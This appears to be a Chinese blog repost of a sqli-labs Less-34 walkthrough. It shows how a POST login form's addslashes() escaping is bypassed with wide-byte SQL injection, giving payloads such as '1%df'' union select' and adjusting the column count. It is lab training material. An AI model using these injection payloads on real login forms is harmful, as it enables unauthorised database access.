码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

时间:2018-01-30 16:54:05      阅读:304      评论:0      收藏:0      [点我收藏+]

标签:匹配   image   sql   技术分享   class   span   版本   bubuko   col   

技术分享图片

还是宽字节注入,POST版本的

uname=1&passwd=1%df‘ union select 1,2,3#

提交报错

技术分享图片

列名不匹配,改一下就好了

uname=1&passwd=1%df‘ union select 1,2#

技术分享图片

看一下源码,果然只select了两个字段

技术分享图片

 

【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

标签:匹配   image   sql   技术分享   class   span   版本   bubuko   col   

原文地址:https://www.cnblogs.com/superkrissV/p/8384458.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!